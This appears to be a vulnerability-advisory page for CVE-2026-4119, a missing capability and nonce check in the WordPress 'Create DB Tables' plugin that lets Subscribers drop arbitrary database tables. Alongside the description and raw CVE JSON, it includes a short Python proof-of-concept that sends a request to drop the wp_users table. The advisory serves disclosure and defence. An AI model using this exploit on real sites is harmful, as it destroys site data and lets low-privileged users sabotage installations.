Security Vulnerability Report
中文
CVE-2026-4119 CVSS 9.1 CRITICAL

CVE-2026-4119

Published: 2026-04-22 09:16:23
Last Modified: 2026-04-22 20:22:51
Source: [email protected]

Description

The Create DB Tables plugin for WordPress is vulnerable to authorization bypass in all versions up to and including 1.2.1. The plugin registers admin_post action hooks for creating tables (admin_post_add_table) and deleting tables (admin_post_delete_db_table) without implementing any capability checks via current_user_can() or nonce verification via wp_verify_nonce()/check_admin_referer(). The admin_post hook only requires the user to be logged in, meaning any authenticated user including Subscribers can access these endpoints. The cdbt_delete_db_table() function takes a user-supplied table name from $_POST['db_table'] and executes a DROP TABLE SQL query, allowing any authenticated attacker to delete any database table including critical WordPress core tables such as wp_users or wp_options. The cdbt_create_new_table() function similarly allows creating arbitrary tables. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create arbitrary database tables and delete any existing database table, potentially destroying the entire WordPress installation.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Create DB Tables <= 1.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests target = 'http://target-wordpress-site.com/wp-admin/admin-post.php' # Cookie of a logged-in user (e.g., Subscriber) cookies = {'wordpress_logged_in_xxx': 'logged_in_cookie_value'} # Payload to delete the wp_users table data = { 'action': 'delete_db_table', 'db_table': 'wp_users' } response = requests.post(target, data=data, cookies=cookies) if response.status_code == 200: print("[+] PoC executed successfully. The table might be dropped.") else: print("[-] Failed to execute PoC.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4119", "sourceIdentifier": "[email protected]", "published": "2026-04-22T09:16:23.330", "lastModified": "2026-04-22T20:22:50.570", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Create DB Tables plugin for WordPress is vulnerable to authorization bypass in all versions up to and including 1.2.1. The plugin registers admin_post action hooks for creating tables (admin_post_add_table) and deleting tables (admin_post_delete_db_table) without implementing any capability checks via current_user_can() or nonce verification via wp_verify_nonce()/check_admin_referer(). The admin_post hook only requires the user to be logged in, meaning any authenticated user including Subscribers can access these endpoints. The cdbt_delete_db_table() function takes a user-supplied table name from $_POST['db_table'] and executes a DROP TABLE SQL query, allowing any authenticated attacker to delete any database table including critical WordPress core tables such as wp_users or wp_options. The cdbt_create_new_table() function similarly allows creating arbitrary tables. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create arbitrary database tables and delete any existing database table, potentially destroying the entire WordPress installation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/create-db-tables/tags/1.2.1/create-db-tables.php#L370", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/create-db-tables/tags/1.2.1/create-db-tables.php#L376", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/create-db-tables/tags/1.2.1/create-db-tables.php#L405", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/create-db-tables/tags/1.2.1/create-db-tables.php#L408", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/create-db-tables/tags/1.2.1/create-new-table.php#L14", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/create-db-tables/tags/1.2.1/create-new-table.php#L69", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/create-db-tables/trunk/create-db-tables.php#L370", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/create-db-tables/trunk/create-db-tables.php#L376", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/create-db-tables/trunk/create-db-tables.php#L405", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/create-db-tables/trunk/create-db-tables.php#L408", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/create-db-tables/trunk/create-new-table.php#L14", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/create-db-tables/trunk/create-new-table.php#L69", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d1a3bc4b-cc17-4728-b242-13841b5f7660?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.